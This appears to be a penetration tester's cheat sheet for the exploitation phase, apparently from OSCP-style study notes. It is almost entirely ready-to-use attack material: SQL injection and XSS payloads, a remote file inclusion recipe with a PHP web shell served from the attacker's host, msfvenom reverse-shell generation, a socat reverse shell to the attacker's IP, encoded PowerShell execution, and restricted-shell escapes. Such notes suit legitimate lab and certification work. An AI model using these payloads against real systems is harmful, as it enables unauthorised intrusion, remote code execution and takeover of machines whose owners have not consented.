Exploitation

• Check for

  • Already Enumerated Credentials (from a previous endpoint in the same network)
  • Default Credentials
    • DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
    • SecLists/Passwords/Default-Credentials
  • Password Attacks#Brute force and Wordlists
    • If you already have valid credentials, is there maybe a pattern in them you recognize and could use for other users?
  • SQL Injection
    • Auth bypass: ' OR '1'='1
    • Remember there are the following injection types:
      • Union based
      • Error based
      • Blind based
      • Time based
      • and some other depending on the DB type
    • Basic procedure:
      1. Check if its vulnerable: < > ' " { } ;
      2. Get the basic syntax down so you can repeat it easily, commonly you can test this by getting the DB version
      3. Extract the DBs
      4. Extract the DBs table names
      5. Extract the tables columns
      6. Extract the tables columns data
    • MSSQL Error Based SQLi Template
    • Great resources:
      • Payloads All The Things
      • What is SQL Injection?
      • SQL injection cheat sheet
      • NetSPI SQL Injection Wiki
      • MSSQL Practical Injection Cheat Sheet - Perspective Risk
      • pentest-everything
      • SQL Injection Cheat Sheet | Invicti
      • OSCP/SQL Injection Cheatsheet
  • XSS: <script>alert('XSS')</script>
    • pentest-everything Cross Site Scripting
  • Command Injection
    • HackTricks Command Injection
    • PHP Command Injection
    • payloadbox Command Injection Payload List
  • Remote File Inclusion
    1. Create a new file called shell.php
    2. Write <?php echo shell_exec($_GET['cmd']); ?> as it's content
    3. Host it: python -m http.server 80
    4. Use it: http://{RHOST}/vuln.php?page=http://{LHOST}/shell.php&cmd=id
    • Try out different file types! Maybe the application has a allow list
    • File Inclusion/Path traversal
  • Buffer Overflow]
  • Malicious Microsoft Word Macro

• Restricted Shells aka. Bash Jails

  • Quick wins:
    • If ‘/’ is allowed
      • export PATH=/bin:/usr/bin:/sbin:$PATH
      • export SHELL=/bin/sh
    • chsh to change the shell:
      • chsh
      • {USER's PASSWORD}
      • /bin/bash
    • Copy sh to our PATH:
      • cp /bin/sh /path/directory; sh
    • SSHing from outside
      • ssh username@IP -t "/bin/sh"
      • ssh username@IP -t "bash --noprofile"
  • Usually works:
    1. Check what you can use: echo $PATH
    2. List directory: ls -al /home/username/*
    3. Get a shell with one of the tools available to you in you're PATH e.g.:
       • python -c "import pty;pty.spawn('/bin/bash')"
       • GTFOBins
    4. Set you're new PATH to make the normal commands relative again: PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
  • Other Resources:
    • HackTricks Escaping from Jails
    • Linux Restricted Shell Bypass

• Public Exploits: searchsploit -m {EXPLOIT_ID}

  • File Transfer Techniques
  • Python
    • Set the appropriate python version
      • pyenv shell 2.7.18
      • pyenv shell 3.10.4
    • Create a venv: pyenv virtualenv {VENV_NAME}
    • Activate it: pyenv activate {VENV_NAME}
    • Deactivate it: source deactivate
  • C
    • 64Bit exploit: gcc -m64 exploit.c -o exploit
    • 32Bit exploit: gcc -m32 exploit.c -o exploit
    • Windows exploits on Linux:
      • i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
      • Compiling Windows Exploits on Kali
  • C++
    • gplusplus
  • C# / CS
    • csc /t:exe exploit.exe exploit.cs
    • For SNL files: (On a Windows host with Visual Studio Community Edition)
      • DoubleClick on the snl file
      • (Maybe change the Architecture to Any)
      • Select the "Build" tab
      • Press "Build Solution"

• Reverse Shell Payloads

  • Get a Listener: rlwrap -r -f . nc -nvlp 4433
  • Reverse Shell Generator
  • [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#reverse-shell)
  • MFSVenom:
    • Windows: msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe
    • Linux:
      • msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf > shell.elf
      • msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf > shell.elf
    • For more variants use: msfvenom --list all

• PowerShell tips:

  • If you want to convert a PowerShell script into it's encrypted state
    • from Kali: cat file.ps1 | iconv -t UTF16LE | base64 -w 0
    • from Win: [Convert]::ToBase64StringUnicode.GetBytes("{COMMAND}")
  • Execute: powershell.exe -enc {ENCODED}

• Create a interactive shell

  • Fully:
    • socat
      • Kali: socat TCP-LISTEN:8080,reuseaddr FILE:tty,raw,echo=0
      • Target: socat TCP4:<attackers_ip>:8080 EXEC:bash,pty,stderr,setsid,sigint,sane
    • /usr/bin/script -qc /bin/bash /dev/null
    • /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
  • Spawn:
    • /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
    • echo os.system('/bin/bash')
    • /bin/sh -i
    • perl —e 'exec "/bin/sh";'
    • perl: exec "/bin/sh";
    • ruby: exec "/bin/sh"
    • lua: os.execute('/bin/sh')
    • From within IRB: exec "/bin/sh"
    • From within vi: :!bash
    • From within vi: :set shell=/bin/bash:shell
    • From within nmap: !sh
  • This is especially interesting if we have sudo permissions for these binaries! (-> PE)
  • Upgrading Simple Shells to Fully Interactive TTYs

• Check if the target can ping kali with: sudo tcpdump -ni tun0

  • Filtering:
    • tcpdump -ni tun0 host 10.1.1.1
    • tcpdump -ni tun0 src host 10.1.1.1
    • tcpdump -ni tun0 dst host 10.1.1.1
    • tcpdump -ni tun0 src net 172.16.0.0/12
    • tcpdump -ni tun0 port 53
    • tcpdump -ni tun0 tcp port 80
    • tcpdump -ni tun0 proto \\icmp
    • ^[1]

Relevant Note(s):